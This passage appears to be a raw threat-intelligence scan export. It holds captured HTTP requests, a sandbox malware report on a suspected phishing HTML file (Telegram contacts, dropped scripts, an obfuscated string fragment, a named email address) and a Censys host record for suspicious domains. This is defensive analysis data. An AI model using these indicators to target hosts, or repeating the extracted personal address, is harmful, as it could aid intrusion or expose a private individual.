en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /resources/4734369bf3fe4ba18a65bca9399741ce?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/4734369bf3fe4ba18a65bca9399741ce/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/4734369bf3fe4ba18a65bca9399741ce/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/4734369bf3fe4ba18a65bca9399741ce HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/4734369bf3fe4ba18a65bca9399741ce HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /thumbnails/uploads/8e20a723 | 35.229.48.116 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.126 | 34.148.97.127 |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:8443 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'MSG349337853.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7544:120:WilError_01"\n "Local\\SM0:7544:304:WilStaging_02"\n "Local\\SM0:7544:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7544:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7328:304:WilStaging_02"\n "Local\\SM0:7328:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7188:304:WilStaging_02"\n "Local\\SM0:7188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.58.100:49728"\n "185.199.109.153:49730"\n "13.35.125.109:49731"\n "149.154.167.220:49732"\n "51.11.192.48:49736"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - Possible RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'Internal YARA signature for possible RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-38', u'name': u'Drops PE files with different extensions', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-177', u'attck_id': u'T1036', u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7544_1106606490\\Part-RU]- [targetUID: 00000000-00007544]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7544_553046708\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007544]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007544]\n "21a2e4ad-e3da-41b8-9593-fd6b14c8cd58.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\21a2e4ad-e3da-41b8-9593-fd6b14c8cd58.tmp]- [targetUID: 00000000-00007544]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.json]- [targetUID: 00000000-00007544]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007544]\n "2e8e03b2-b8a9-4702-ad28-272010504828.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\2e8e03b2-b8a9-4702-ad28-272010504828.tmp]- [targetUID: 00000000-00007544]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00007544]\n "Session_13320464616168949" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13320464616168949]- [targetUID: 00000000-00007544]\n "645c73c7-b711-4558-a7af-9f09cc1391b4.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\645c73c7-b711-4558-a7af-9f09cc1391b4.tmp]- [targetUID: 00000000-00007544]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7544_1106606490\\Filtering Rules-AA]- [targetUID: 00000000-00007544]\n "608c2647-0afe-41c3-8b3c-3682b3d2a73a.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\608c2647-0afe-41c3-8b3c-3682b3d2a73a.tmp]- [targetUID: 00000000-00007544]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7544_553046708\\shoppingfre.js]- [targetUID: 00000000-00007544]\n "8bb5048e-d66c-4c42-9ef2-04ce3c812e6f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8bb5048e-d66c-4c42-9ef2-04ce3c812e6f.tmp]- [targetUID: 00000000-00007544]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007272]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007544]\n "7406036f-2f9e-4939-8d5b-442a52cfa1c5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7406036f-2f9e-4939-8d5b-442a52cfa1c5.tmp]- [targetUID: 00000000-00007544]\n "LOG" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\LOG]- [targetUID: 00000000-00007544]\n "manifest.fingerprint" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00007544]\n "Variations" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00007544]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'QtjLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydg"\n Heuristic match: "api.telegram.org"\n Heuristic match: "getbootstrap.com"\n Heuristic match: "fernando.r@alliedglobal.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Pattern match: "fernando.r@alliedglobal.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/60 Antivirus vendors marked sample as malicious (16% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-7', u'name': u'Uses network protocols on unusual ports', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1571', u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': u'T1571', u'relevance': 7, u'threat_level': 2, u'type': 7, u'description': u'TCP traffic to 104.22.58.100 on port 49728\n TCP traffic to 185.199.109.153 on port 49730\n TCP traffic to 13.35.125.109 on port 49731\n TCP traffic to 149.154.167.220 on port 49732\n TCP traffic to 51.11.192.48 on port 49736'}], u'threat_level': 2, u'size': 102455, u'job_id': u'63e596ab38f3a44d604cd090', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None | 185.199.109.153 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, 